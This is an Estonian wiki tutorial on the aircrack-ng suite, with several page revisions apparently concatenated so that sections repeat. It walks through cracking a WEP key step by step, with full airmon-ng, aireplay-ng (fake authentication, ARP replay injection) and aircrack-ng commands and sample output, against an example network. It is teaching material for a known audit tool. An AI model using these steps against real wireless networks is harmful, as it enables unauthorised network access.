aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]</ref>:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt<ref>[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]</ref>:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]</ref>:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]</ref>.

==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]</ref>: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]</ref> 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav ''airmon-ng stop ath0'' käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

'''Pane tähele!''' “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]</ref> 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:'' 
''-9 - “süstimise” test'' 
''-e teddy – raadiovõrgu nimi'' 
''-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress'' 
''ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

'''Pane tähele!''' Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:'' 
''-c 9 – raadiovõrgu kanal'' 
''--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda'' 
''-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:'' 
''-1 – võlts autentimine'' 
''0 – kordusühendus(t)e aeg sekundites'' 
''-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>

Ebaõnnestumise korral on tulemus:
<pre>8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]</ref> 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]</ref> 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
''-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub'' 
''output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references />

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-25T19:52:37Z

Ktragel: /* Installeerimine */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt<ref>[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]</ref>:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]</ref>:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]</ref>.

==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]</ref>: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]</ref> 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav ''airmon-ng stop ath0'' käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

'''Pane tähele!''' “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]</ref> 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:'' 
''-9 - “süstimise” test'' 
''-e teddy – raadiovõrgu nimi'' 
''-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress'' 
''ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

'''Pane tähele!''' Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:'' 
''-c 9 – raadiovõrgu kanal'' 
''--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda'' 
''-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:'' 
''-1 – võlts autentimine'' 
''0 – kordusühendus(t)e aeg sekundites'' 
''-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>

Ebaõnnestumise korral on tulemus:
<pre>8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]</ref> 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]</ref> 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
''-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub'' 
''output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references />

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-25T19:50:47Z

Ktragel: /* Näide WEP võtme lahti murdmise protsessist */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]</ref>:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
